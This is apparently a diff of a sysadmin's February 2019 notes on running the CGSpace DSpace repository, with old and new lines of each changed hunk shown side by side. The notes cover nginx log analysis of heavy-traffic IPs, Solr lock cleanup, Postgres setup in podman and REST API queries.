<pre tabindex="0"><code># zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep 45.5.186.2 | grep -o -E &#39;06/Feb/2019:0[0-9]:[0-9][0-9]&#39; | uniq -c | sort -n | tail -n 10
118 06/Feb/2019:05:46
119 06/Feb/2019:05:37
119 06/Feb/2019:05:47
@ -382,7 +382,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
</code></pre><ul>
<li>I was thinking of rate limiting those because I assumed most of them would be errors, but actually most are HTTP 200 OK!</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E '06/Feb/2019' | grep 45.5.186.2 | awk '{print $9}' | sort | uniq -c
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#39;06/Feb/2019&#39; | grep 45.5.186.2 | awk &#39;{print $9}&#39; | sort | uniq -c
10411 200
1 301
7 302
@ -392,7 +392,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
</code></pre><ul>
<li>I should probably start looking at the top IPs for web (XMLUI) and for API (REST and OAI) separately:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;06/Feb/2019:0(5|6|7|8|9)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;06/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
328 220.247.212.35
372 66.249.66.221
380 207.46.13.2
@ -403,7 +403,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
1236 5.9.6.51
1554 66.249.66.219
4942 85.25.237.71
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &quot;06/Feb/2019:0(5|6|7|8|9)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;06/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
10 66.249.66.221
26 66.249.66.219
69 5.143.231.8
@ -419,7 +419,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
<li>Linode sent an alert last night that the load on CGSpace (linode18) was over 300%</li>
<li>Here are the top IPs in the web server and API logs before, during, and after that time, respectively:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &quot;06/Feb/2019:(17|18|19|20|23)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;06/Feb/2019:(17|18|19|20|23)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
5 66.249.66.209
6 2a01:4f8:210:51ef::2
6 40.77.167.75
@ -430,7 +430,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
20 95.108.181.88
27 66.249.66.219
2381 45.5.186.2
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;06/Feb/2019:(17|18|19|20|23)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;06/Feb/2019:(17|18|19|20|23)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
455 45.5.186.2
506 40.77.167.75
559 54.70.40.11
@ -444,7 +444,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
</code></pre><ul>
<li>Then again this morning another alert:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &quot;07/Feb/2019:0(5|6|7|8|9)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;07/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
5 66.249.66.223
8 104.198.9.108
13 110.54.160.222
@ -455,7 +455,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
4529 45.5.186.2
4661 205.186.128.185
4661 70.32.83.92
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;07/Feb/2019:0(5|6|7|8|9)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;07/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
145 157.55.39.237
154 66.249.66.221
214 34.218.226.147
@ -513,7 +513,7 @@ Please see the DSpace documentation for assistance.
<li>Linode sent alerts about CPU load yesterday morning, yesterday night, and this morning! All over 300% CPU load!</li>
<li>This is just for this morning:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;09/Feb/2019:(07|08|09|10|11)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;09/Feb/2019:(07|08|09|10|11)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
289 35.237.175.180
290 66.249.66.221
296 18.195.78.144
@ -524,7 +524,7 @@ Please see the DSpace documentation for assistance.
742 5.143.231.38
1046 5.9.6.51
1331 66.249.66.219
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &quot;09/Feb/2019:(07|08|09|10|11)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;09/Feb/2019:(07|08|09|10|11)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
4 66.249.83.30
5 49.149.10.16
8 207.46.13.64
@ -547,7 +547,7 @@ Please see the DSpace documentation for assistance.
<ul>
<li>Linode sent another alert about CGSpace (linode18) CPU load this morning, here are the top IPs in the web server XMLUI and API logs before, during, and after that time:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;10/Feb/2019:0(5|6|7|8|9)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;10/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
232 18.195.78.144
238 35.237.175.180
281 66.249.66.221
@ -558,7 +558,7 @@ Please see the DSpace documentation for assistance.
444 2a01:4f8:140:3192::2
1171 5.9.6.51
1196 66.249.66.219
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &quot;10/Feb/2019:0(5|6|7|8|9)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;10/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
6 112.203.241.69
7 157.55.39.149
9 40.77.167.178
@ -572,16 +572,16 @@ Please see the DSpace documentation for assistance.
</code></pre><ul>
<li>Another interesting thing might be the total number of requests for web and API services during that time:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -cE &quot;10/Feb/2019:0(5|6|7|8|9)&quot;
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -cE &#34;10/Feb/2019:0(5|6|7|8|9)&#34;
16333
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -cE &quot;10/Feb/2019:0(5|6|7|8|9)&quot;
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -cE &#34;10/Feb/2019:0(5|6|7|8|9)&#34;
15964
</code></pre><ul>
<li>Also, the number of unique IPs served during that time:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;10/Feb/2019:0(5|6|7|8|9)&quot; | awk '{print $1}' | sort | uniq | wc -l
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;10/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
1622
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &quot;10/Feb/2019:0(5|6|7|8|9)&quot; | awk '{print $1}' | sort | uniq | wc -l
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;10/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
95
</code></pre><ul>
<li>It&rsquo;s very clear to me now that the API requests are the heaviest!</li>
@ -643,7 +643,7 @@ Please see the DSpace documentation for assistance.
<li>On a similar note, I wonder if we could use the performance-focused <a href="https://libvips.github.io/libvips/">libvips</a> and the third-party <a href="https://github.com/codecitizen/jlibvips/">jlibvips Java library</a> in DSpace</li>
<li>Testing the <code>vipsthumbnail</code> command line tool with <a href="https://cgspace.cgiar.org/handle/10568/51999">this CGSpace item that uses CMYK</a>:</li>
</ul>
<pre tabindex="0"><code>$ vipsthumbnail alc_contrastes_desafios.pdf -s 300 -o '%s.jpg[Q=92,optimize_coding,strip]'
<pre tabindex="0"><code>$ vipsthumbnail alc_contrastes_desafios.pdf -s 300 -o &#39;%s.jpg[Q=92,optimize_coding,strip]&#39;
</code></pre><ul>
<li>(DSpace 5 appears to use JPEG 92 quality so I do the same)</li>
<li>Thinking about making &ldquo;top items&rdquo; endpoints in my <a href="https://github.com/ilri/dspace-statistics-api">dspace-statistics-api</a></li>
@ -693,7 +693,7 @@ dspacestatistics=# SELECT * FROM items WHERE downloads &gt; 0 ORDER BY downloads
<li>Thierry from CTA is having issues with his account on DSpace Test, and there is no admin password reset function on DSpace (only via email, which is disabled on DSpace Test), so I have to delete and re-create his account:</li>
</ul>
<pre tabindex="0"><code>$ dspace user --delete --email blah@cta.int
$ dspace user --add --givenname Thierry --surname Lewyllie --email blah@cta.int --password 'blah'
$ dspace user --add --givenname Thierry --surname Lewyllie --email blah@cta.int --password &#39;blah&#39;
</code></pre><ul>
<li>On this note, I saw a thread on the dspace-tech mailing list that says this functionality exists if you enable <code>webui.user.assumelogin = true</code></li>
<li>I will enable this on CGSpace (<a href="https://github.com/ilri/DSpace/pull/411">#411</a>)</li>
@ -728,14 +728,14 @@ $ podman run --name dspacedb -v /home/aorth/.local/lib/containers/volumes/dspace
</code></pre><ul>
<li>After running the playbook CGSpace came back up, but I had an issue with some Solr cores not being loaded (similar to last month) and this was in the Solr log:</li>
</ul>
<pre tabindex="0"><code>2019-02-14 18:17:31,304 ERROR org.apache.solr.core.SolrCore @ org.apache.solr.common.SolrException: Error CREATEing SolrCore 'statistics-2018': Unable to create core [statistics-2018] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2018/data/index/write.lock
<pre tabindex="0"><code>2019-02-14 18:17:31,304 ERROR org.apache.solr.core.SolrCore @ org.apache.solr.common.SolrException: Error CREATEing SolrCore &#39;statistics-2018&#39;: Unable to create core [statistics-2018] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2018/data/index/write.lock
</code></pre><ul>
<li>The issue last month was address space, which is now set as <code>LimitAS=infinity</code> in <code>tomcat7.service</code>&hellip;</li>
<li>I re-ran the Ansible playbook to make sure all configs etc were the same, then rebooted the server</li>
<li>Still the error persists after reboot</li>
<li>I will try to stop Tomcat and then remove the locks manually:</li>
</ul>
<pre tabindex="0"><code># find /home/cgspace.cgiar.org/solr/ -iname &quot;write.lock&quot; -delete
<pre tabindex="0"><code># find /home/cgspace.cgiar.org/solr/ -iname &#34;write.lock&#34; -delete
</code></pre><ul>
<li>After restarting Tomcat the usage statistics are back</li>
<li>Interestingly, many of the locks were from last month, last year, and even 2015! I&rsquo;m pretty sure that&rsquo;s not supposed to be how locks work&hellip;</li>
@ -795,10 +795,10 @@ $ podman volume create dspacedb_data
$ podman run --name dspacedb -v dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
$ createuser -h localhost -U postgres --pwprompt dspacetest
$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest superuser;&#39;
$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost dspace_2019-02-11.backup
$ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest nosuperuser;&#39;
</code></pre><ul>
<li>And it&rsquo;s all running without root!</li>
<li>Then re-create my Artifactory container as well, taking into account ulimit open file requirements by Artifactory as well as the user limitations caused by rootless subuid mappings:</li>
@ -818,12 +818,12 @@ $ podman start artifactory
<li>I ran DSpace&rsquo;s cleanup task on CGSpace (linode18) and there were errors:</li>
</ul>
<pre tabindex="0"><code>$ dspace cleanup -v
Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(162844) is still referenced from table &quot;bundle&quot;.
Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(162844) is still referenced from table &#34;bundle&#34;.
</code></pre><ul>
<li>The solution is, as always:</li>
</ul>
<pre tabindex="0"><code>$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (162844);'
<pre tabindex="0"><code>$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (162844);&#39;
UPDATE 1
</code></pre><ul>
<li>I merged the Atmire Metadata Quality Module (MQM) changes to the <code>5_x-prod</code> branch and deployed it on CGSpace (<a href="https://github.com/ilri/DSpace/pull/407">#407</a>)</li>
@ -834,7 +834,7 @@ UPDATE 1
<li>Jesus fucking Christ, Linode sent an alert that CGSpace (linode18) was using 421% CPU for a few hours this afternoon (server time):</li>
<li>There seems to have been a lot of activity in XMLUI:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;18/Feb/2019:1(2|3|4|5|6)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;18/Feb/2019:1(2|3|4|5|6)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
1236 18.212.208.240
1276 54.164.83.99
1277 3.83.14.11
@ -845,7 +845,7 @@ UPDATE 1
1327 52.54.252.47
1477 5.9.6.51
1861 94.71.244.172
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &quot;18/Feb/2019:1(2|3|4|5|6)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;18/Feb/2019:1(2|3|4|5|6)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
8 42.112.238.64
9 121.52.152.3
9 157.55.39.50
@ -856,15 +856,15 @@ UPDATE 1
28 66.249.66.219
43 34.209.213.122
178 50.116.102.77
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;18/Feb/2019:1(2|3|4|5|6)&quot; | awk '{print $1}' | sort | uniq | wc -l
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;18/Feb/2019:1(2|3|4|5|6)&#34; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
2727
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &quot;18/Feb/2019:1(2|3|4|5|6)&quot; | awk '{print $1}' | sort | uniq | wc -l
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;18/Feb/2019:1(2|3|4|5|6)&#34; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
186
</code></pre><ul>
<li>94.71.244.172 is in Greece and uses the user agent &ldquo;Indy Library&rdquo;</li>
<li>At least they are re-using their Tomcat session:</li>
</ul>
<pre tabindex="0"><code>$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=94.71.244.172' dspace.log.2019-02-18 | sort | uniq | wc -l
<pre tabindex="0"><code>$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=94.71.244.172&#39; dspace.log.2019-02-18 | sort | uniq | wc -l
</code></pre><ul>
<li>
<p>The following IPs were all hitting the server hard simultaneously and are located on Amazon and use the user agent &ldquo;Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0&rdquo;:</p>
@ -886,7 +886,7 @@ UPDATE 1
<p>For reference most of these IPs hitting the XMLUI this afternoon are on Amazon:</p>
</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;18/Feb/2019:1(2|3|4|5|6)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 30
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;18/Feb/2019:1(2|3|4|5|6)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 30
1173 52.91.249.23
1176 107.22.118.106
1178 3.88.173.152
@ -920,7 +920,7 @@ UPDATE 1
</code></pre><ul>
<li>In the case of 52.54.252.47 they are only making about 10 requests per minute during this time (albeit from dozens of concurrent IPs):</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep 52.54.252.47 | grep -o -E '18/Feb/2019:1[0-9]:[0-9][0-9]' | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep 52.54.252.47 | grep -o -E &#39;18/Feb/2019:1[0-9]:[0-9][0-9]&#39; | uniq -c | sort -n | tail -n 10
10 18/Feb/2019:17:20
10 18/Feb/2019:17:22
10 18/Feb/2019:17:31
@ -935,7 +935,7 @@ UPDATE 1
<li>As this user agent is not recognized as a bot by DSpace this will definitely fuck up the usage statistics</li>
<li>There were 92,000 requests from these IPs alone today!</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -c 'Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0'
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -c &#39;Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0&#39;
92756
</code></pre><ul>
<li>I will add this user agent to the <a href="https://github.com/ilri/rmg-ansible-public/blob/master/roles/dspace/templates/nginx/default.conf.j2">&ldquo;badbots&rdquo; rate limiting in our nginx configuration</a></li>
@ -943,7 +943,7 @@ UPDATE 1
<li>IWMI sent a few new ORCID identifiers for us to add to our controlled vocabulary</li>
<li>I will merge them with our existing list and then resolve their names using my <code>resolve-orcids.py</code> script:</li>
</ul>
<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml 2019-02-18-IWMI-ORCID-IDs.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq &gt; /tmp/2019-02-18-combined-orcids.txt
<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml 2019-02-18-IWMI-ORCID-IDs.txt | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq &gt; /tmp/2019-02-18-combined-orcids.txt
$ ./resolve-orcids.py -i /tmp/2019-02-18-combined-orcids.txt -o /tmp/2019-02-18-combined-names.txt -d
# sort names, copy to cg-creator-id.xml, add XML formatting, and then format with tidy (preserving accents)
$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
@ -956,7 +956,7 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
<li>Unfortunately, I don&rsquo;t see any strange activity in the web server API or XMLUI logs at that time in particular</li>
<li>So far today the top ten IPs in the XMLUI logs are:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;19/Feb/2019:&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;19/Feb/2019:&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
11541 18.212.208.240
11560 3.81.136.184
11562 3.88.237.84
@ -978,7 +978,7 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
</li>
<li>The top requests in the API logs today are:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &quot;19/Feb/2019:&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;19/Feb/2019:&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
42 66.249.66.221
44 156.156.81.215
55 3.85.54.129
@ -999,17 +999,17 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
<li>I need to follow up with the DSpace developers and Atmire to see how they classify which requests are bots so we can try to estimate the impact caused by these users and perhaps try to update the list to make the stats more accurate</li>
<li>I found one IP address in Nigeria that has an Android user agent and has requested a bitstream from <a href="https://hdl.handle.net/10568/96140">10568/96140</a> almost 200 times:</li>
</ul>
<pre tabindex="0"><code># grep 41.190.30.105 /var/log/nginx/access.log | grep -c 'acgg_progress_report.pdf'
<pre tabindex="0"><code># grep 41.190.30.105 /var/log/nginx/access.log | grep -c &#39;acgg_progress_report.pdf&#39;
185
</code></pre><ul>
<li>Wow, and another IP in Nigeria made a bunch more yesterday from the same user agent:</li>
</ul>
<pre tabindex="0"><code># grep 41.190.3.229 /var/log/nginx/access.log.1 | grep -c 'acgg_progress_report.pdf'
<pre tabindex="0"><code># grep 41.190.3.229 /var/log/nginx/access.log.1 | grep -c &#39;acgg_progress_report.pdf&#39;
346
</code></pre><ul>
<li>In the last two days alone there were 1,000 requests for this PDF, mostly from Nigeria!</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep acgg_progress_report.pdf | grep -v 'upstream response is buffered' | awk '{print $1}' | sort | uniq -c | sort -n
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep acgg_progress_report.pdf | grep -v &#39;upstream response is buffered&#39; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n
1 139.162.146.60
1 157.55.39.159
1 196.188.127.94
@ -1042,9 +1042,9 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
<li>I told him that they should probably try to use the REST API&rsquo;s <code>find-by-metadata-field</code> endpoint</li>
<li>The annoying thing is that you have to match the text language attribute of the field exactly, but it does work:</li>
</ul>
<pre tabindex="0"><code>$ curl -s -H &quot;accept: application/json&quot; -H &quot;Content-Type: application/json&quot; -X POST &quot;https://cgspace.cgiar.org/rest/items/find-by-metadata-field&quot; -d '{&quot;key&quot;: &quot;cg.creator.id&quot;,&quot;value&quot;: &quot;Alan S. Orth: 0000-0002-1735-7458&quot;, &quot;language&quot;: &quot;&quot;}'
$ curl -s -H &quot;accept: application/json&quot; -H &quot;Content-Type: application/json&quot; -X POST &quot;https://cgspace.cgiar.org/rest/items/find-by-metadata-field&quot; -d '{&quot;key&quot;: &quot;cg.creator.id&quot;,&quot;value&quot;: &quot;Alan S. Orth: 0000-0002-1735-7458&quot;, &quot;language&quot;: null}'
$ curl -s -H &quot;accept: application/json&quot; -H &quot;Content-Type: application/json&quot; -X POST &quot;https://cgspace.cgiar.org/rest/items/find-by-metadata-field&quot; -d '{&quot;key&quot;: &quot;cg.creator.id&quot;,&quot;value&quot;: &quot;Alan S. Orth: 0000-0002-1735-7458&quot;, &quot;language&quot;: &quot;en_US&quot;}'
<pre tabindex="0"><code>$ curl -s -H &#34;accept: application/json&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;https://cgspace.cgiar.org/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;: &#34;cg.creator.id&#34;,&#34;value&#34;: &#34;Alan S. Orth: 0000-0002-1735-7458&#34;, &#34;language&#34;: &#34;&#34;}&#39;
$ curl -s -H &#34;accept: application/json&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;https://cgspace.cgiar.org/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;: &#34;cg.creator.id&#34;,&#34;value&#34;: &#34;Alan S. Orth: 0000-0002-1735-7458&#34;, &#34;language&#34;: null}&#39;
$ curl -s -H &#34;accept: application/json&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;https://cgspace.cgiar.org/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;: &#34;cg.creator.id&#34;,&#34;value&#34;: &#34;Alan S. Orth: 0000-0002-1735-7458&#34;, &#34;language&#34;: &#34;en_US&#34;}&#39;
</code></pre><ul>
<li>This returns six items for me, which is the <a href="https://cgspace.cgiar.org/discover?filtertype_1=orcid&amp;filter_relational_operator_1=contains&amp;filter_1=Alan+S.+Orth%3A+0000-0002-1735-7458&amp;submit_apply_filter=&amp;query=">same as what I see in a Discovery search</a></li>
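<li>To count the matches from one of those queries without eyeballing the JSON, something like this works (a sketch, assuming <code>jq</code> is available):</li>
</ul>
<pre tabindex="0"><code>$ curl -s -H &#34;accept: application/json&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;https://cgspace.cgiar.org/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;: &#34;cg.creator.id&#34;,&#34;value&#34;: &#34;Alan S. Orth: 0000-0002-1735-7458&#34;, &#34;language&#34;: &#34;en_US&#34;}&#39; | jq length
</code></pre><ul>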
<li>Hector Tobon from CIAT asked if it was possible to get item statistics from CGSpace so I told him to use my <a href="https://github.com/ilri/dspace-statistics-api">dspace-statistics-api</a></li>
@ -1075,7 +1075,7 @@ $ ./agrovoc-lookup.py -l fr -i /tmp/top-1500-subjects.txt -om /tmp/matched-subje
</ul>
<pre tabindex="0"><code>$ sort /tmp/top-1500-subjects.txt &gt; /tmp/subjects-sorted.txt
$ comm -13 /tmp/2019-02-21-matched-subjects.txt /tmp/subjects-sorted.txt &gt; /tmp/2019-02-21-unmatched-subjects.txt
$ diff --new-line-format=&quot;&quot; --unchanged-line-format=&quot;&quot; /tmp/subjects-sorted.txt /tmp/2019-02-21-matched-subjects.txt &gt; /tmp/2019-02-21-unmatched-subjects.txt
